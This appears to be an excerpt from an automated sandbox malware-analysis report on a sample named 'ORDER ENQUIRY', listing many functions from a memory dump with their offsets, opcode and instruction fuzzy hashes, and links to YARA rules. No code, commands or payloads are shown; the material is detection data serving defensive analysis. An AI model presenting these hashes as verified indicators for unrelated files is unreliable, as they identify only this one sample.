Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
Instruction ID: ac652f5a72d52b0ca964c3ad6583cbca0cfed64135593e75b66139f5b5d7902c
Opcode Fuzzy Hash: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
Instruction Fuzzy Hash: 23219C71600645AFDB15EBADC940F6AB7A8FF88740F1440A9F904D7691D734ED50CBA8

Function 01B30283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
Instruction ID: 5125f775416d10f29f0e17d88463181fe8893efe9bba6efbb8428e4fda8e33ae
Opcode Fuzzy Hash: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
Instruction Fuzzy Hash: A621D0729047469BD715EF69C984BABBBECEFD5640F08449ABD80C7251D730C918C7A2

Function 01AD2835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
Instruction ID: 232174eb6566855f3aa08429be70bce02c5495b2751ae0298ad590256faf618b
Opcode Fuzzy Hash: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
Instruction Fuzzy Hash: 04212331606AC19BE727673C8D44B283B94EF41B70F6A03E5FA219B6E2DB68D801C210

Function 01AEA30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
Instruction ID: 4c806f36d79557eb808d9f3e375df4ebc25c9fa39327b1b50270b99e36d5f769
Opcode Fuzzy Hash: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
Instruction Fuzzy Hash: D221AC792006119FCB29DF29C901B56B7F5FF08B04F1884ADE509CB761E371E846CB94

Function 01B6A49A Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
Instruction ID: dd6cd53201ac8f3d9b343b4ef0077d4542f28e15762552c9581e1d8c0f9deb36
Opcode Fuzzy Hash: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
Instruction Fuzzy Hash: 3E113A72380A11BFDB26A5749C41F2B769DDBE4B60F1000A8B708EB190EF78DC0187D5

Function 01B30946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
Instruction ID: 96af5e3d1af4b668081bf206a02379b199c6a6fd212ce8ff2548edfda2fa9b54
Opcode Fuzzy Hash: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
Instruction Fuzzy Hash: B921C6B1E00249ABDB24DFAED9819AEFBF8FF98710F10016EE505A7250D7709945CB54

Function 01B480A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: 81e39039b98199623e746b54212991d334971bfce6e568fcf45ed262a749dce3
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: 0B218E72A00209EFDF129F99CC40BAEBBB9EF48710F20845AF905A7251D734D950EB50

Function 01AE0124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: e5a4c745ba1e1f696842ecce58c58220394e280672790d70ad3688f7fc7952f9
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 1411E272600705AFD7269B58CE88F9ABBB8EB80754F110029F6008F180D6B1ED44CB60

Function 01AB8770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
Instruction ID: 799bc36383aa4821989cb8e09adbdfd203112549baf5185e71f6797314a61dbf
Opcode Fuzzy Hash: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
Instruction Fuzzy Hash: C61104317016919BDB12CF4DC5C0A9ABBEDAF4A755B1840BDEE088F206D6B6D942C790

Function 01AEAAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction ID: 640b6244a75b80d1da134ad345758b582ced7807ba0e1a2c98dbe5e5a41e8904
Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction Fuzzy Hash: 16218872600A41DFDB359F49C648A66FBF6EB94B50F14897DE94A9BA10C730EC01CB80

Function 01AB80E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
Instruction ID: 78571980afb00c831b75ab50f616ca7930c717e3f7b0700b61456a61dce5c688
Opcode Fuzzy Hash: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
Instruction Fuzzy Hash: 2D219D71A01246DFCB14CF9CC581AAEBBB9FB88718F24416DD105AB311CB75AD06CBD0

Function 01AE674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
Instruction ID: b76a03c1400c98271ec55ccf6a73fc16c76be5223dee0fe90c6808b55009f2b6
Opcode Fuzzy Hash: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
Instruction Fuzzy Hash: C2218C71600A01EFD7218F69C881B66B7F8FF54650F44882DE5AEC7250DB70A840CBA0

Function 01ADE8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
Instruction ID: 4c73fa7f6f698c05a6fc1a5de67d174eac53da777c68877bcbefb868b1559f29
Opcode Fuzzy Hash: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
Instruction Fuzzy Hash: 3A1125732051109BCB19CB28CD80A7BB766EBD5370B69456DD923CB280EA308C02C690

Function 01B46870 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
Instruction ID: 85a2d8456ff188910c6602cf94dc2e771cac1a2e5bdc153ca9af01b76bd7b8c0
Opcode Fuzzy Hash: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
Instruction Fuzzy Hash: BA11E336640604FFD726DB5DCD40F9A77A8EF5AB50F018069F205DB251DBB0E901D7A0

Function 01AE66B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
Instruction ID: a4fb0bea7c8b70488150f8a55688505224cea3168d86e7541129d7bd7c0940e8
Opcode Fuzzy Hash: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
Instruction Fuzzy Hash: E2119EB6A51205DFCB25CF59C584A5ABBF8AFA4750F09847ED909AB311FB34DD00CB90

Function 01B7A8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: ad6e2d6ef71e3c9e6013b6521538912f1a0a3a5d33611536127f60b91405f3b7
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: 6D11C436A00915AFDF1DCB68CC05B9DBBB5EF84210F0982A9E85697380E775BD51CB80

Function 01AB0AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: 249209a897d2b86c2b01551c281a43fb3c040da0edd3a407a7a7d650acd052cc
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: FD21C3B5A40B459FD3A0CF29D581B56BBF4FB48B20F10492EE98AC7B50E371E854CB94

Function 01B3E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: bb6901b86dffddf332513cfbebab675a0e96bb052e10d52def05e0d8210833af
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: 2A11C631E00605EFEB299F48C940B567BE5EFC5754F0584AEFA099B190E731EC50DB90

Function 01AD27ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
Instruction ID: 980dc1292c5cd5d2eedcfea26851494b6180b3a9215f78c7579da650ec07c4a0
Opcode Fuzzy Hash: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
Instruction Fuzzy Hash: 56012631206A85AFE31BA27DDC84F6B7B9CFF90750F4A40B6F9018B251DA14EC00C2A1

Function 01AB4690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
Instruction ID: 9a0e31ba0aae65b34c20d3115b012783181155bbd3087f4b5975e52dbc4840c7
Opcode Fuzzy Hash: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
Instruction Fuzzy Hash: 3C11CE76200685AFDB25CF59D984F967BACEB8AB64F04411AF9068B653C370E880DF60

Function 01B84B00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
Instruction ID: 79e030b552183b24d8a0852d5f568d981f49400aa1fad39fb4a1b05f8f54e6e5
Opcode Fuzzy Hash: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
Instruction Fuzzy Hash: CC11E9362006129FD726EA69D840F67B7A5FFC4B11F154569E646C7690DB30E802C790

Function 01AE6620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
Instruction ID: 40dbf89c4e7728cfae748aecddca45ee59082f91dc0e51ae7ff2dda14c5ff61b
Opcode Fuzzy Hash: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
Instruction Fuzzy Hash: 3611C272A10615ABDB26DF59C9C4B9EFBF8EF54740F500858DA08A7201D734AD018F50

Function 01ADEA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
Instruction ID: e9b3a2411274a14527520fb13ec84f7852e3d2e7580cb23bfdb00f5e01b812b0
Opcode Fuzzy Hash: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
Instruction Fuzzy Hash: 9E01F17160014AAFC325DF18D584F66BBFAFB81314F6081AAE1068B266D770ED42CBA0

Function 01ADE53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: 0047c5097f4f8fc95c995b959f9f716154bbed355009a33d0cc29c39bb386b76
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: 0E11E572201AC29BEB27976CC944B753BA4EF00BC4F5E04E8DE428B642F329C846C250

Function 01B3E75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: 8eb3284dbb91a8c57c9a1188cb8c89f9e417826d6a34587ff5830e94dd8ead08
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 1B01F536600105EFEB2A9F58CD40F5B7BA9EFC1B50F0581A6FA059B260E771DD50CB90

Function 01AAA250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: cda93277b4f64e8c011a311fcb6f86cb684ebba839e02f1f086a3c7b8ff4cba0
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: 85014572504B229BCB328F19D840A327BF4FF55B607408A2DFD958B2A1C331D828CBA0

Function 01B84940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
Instruction ID: 3db42f82d6718bea24764c98fb49730670d81518c693c1844629af8c4a2f2a68
Opcode Fuzzy Hash: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
Instruction Fuzzy Hash: 470145724416029FC336EF1CC904F52F7A8EB91B70B2643A9E9A89B1A2D730DC01CBC0

Function 01B2E1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
Instruction ID: 85f0b740ef3b101b93954d0f7adc273ededae3870b79b4dc54de1a0f943608ee
Opcode Fuzzy Hash: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
Instruction Fuzzy Hash: 8C11C431241641EFDB15EF59CD80F567BB8FF58B54F1400A9F9069B661C335ED01CAA0

Function 01AB6259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
Instruction ID: 02cf8abdf0e5db594246f75c736d5701028e5ec7b0abd7ce78d88b573e327428
Opcode Fuzzy Hash: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
Instruction Fuzzy Hash: 04114870941229ABEB25AF64CE42FE9B2B8BF04710F5041D9B718A60E1DB709E81CF84

Function 01AB208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 76e48faaadf0d9d51892daa5dbf58b1f1aa0f50046278d244bc904aa4605bb6f
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 9001F5322001418BDF269A2DD8C0BA27B6AFFC4610F1944ABED058F287DA71AC81C790

Function 01B36050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
Instruction ID: cbd68a3722267c083144b4c3054a623f3b18c10ff5f09f407c24a5da1b33c0ed
Opcode Fuzzy Hash: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
Instruction Fuzzy Hash: A5111772900019BBCB15DB94CD85DEFBBBCEF58354F044166E916E7211EA34EA15CBE0

Function 01B46500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
Instruction ID: dd5d5c6f2c9a5d320d20d89f44daacdbf39f9f0b952babbe5338692e65793444
Opcode Fuzzy Hash: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
Instruction Fuzzy Hash: E111C47264414A9FD715CF58D810BA6BBB9FB5A314F08C199E888CB315D732EC81DBE0

Function 01B3C810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
Instruction ID: 33bba78c4e71d64bd11c354df9616af82828ec90f7f456ae4ee3ccdf0dcf1bf6
Opcode Fuzzy Hash: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
Instruction Fuzzy Hash: 3111E8B5A002099BCB04DFA9D581AAEBBF8FF58250F10806AF905E7351D674EE01CBA4

Function 01AF20F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
Instruction ID: 6576a8499254044ee59ac96814da37d4754a397787b4df1795bb28910af092de
Opcode Fuzzy Hash: ec29ff20a420604ec4e84a05387630c491e077829d3783be6f4b1af4b0dd4502
Instruction Fuzzy Hash: EF116935A0020DABCF15EFA4C951BAE7BB5EB49690F108099FA059B290DB35EE11CB94

Function 01AAC020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: e1066d2da7e12301032437bf06a2ec36c97544314fd9cf2b8159185d80423d50
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: 3201D8321407059FEB27A6A9C900FA77BF9FFC5660F44885DE9468B580EB71E401CB50

Function 01AEE5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
Instruction ID: 33858f613b76142f1649b7d69a4e38377a03a7652a2971cc6b31d9c25cfa3386
Opcode Fuzzy Hash: bab9807c4e33fdc0a416ff34fd3cb56827a9e8efc8d6c6101565f97d5bc5cce2
Instruction Fuzzy Hash: FF01F7B2200915BFC315AB39CE40F57B7ACFF55A54B04062AF10983561DB24EC01C6E0

Function 01B469C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
Instruction ID: c1c1c341161d70f045ef4e52cdc3fc290c6bdaa6f7499fda70bb6d6d08d34f05
Opcode Fuzzy Hash: 2cb4329d9ed9ed9d49e2957f61574c87b3a42c830d2354c7ba65a5ea32b0778c
Instruction Fuzzy Hash: AC014C322147069BC324DF69D888AB7BBA8FF49720F118269F95887280E7309901C7D1

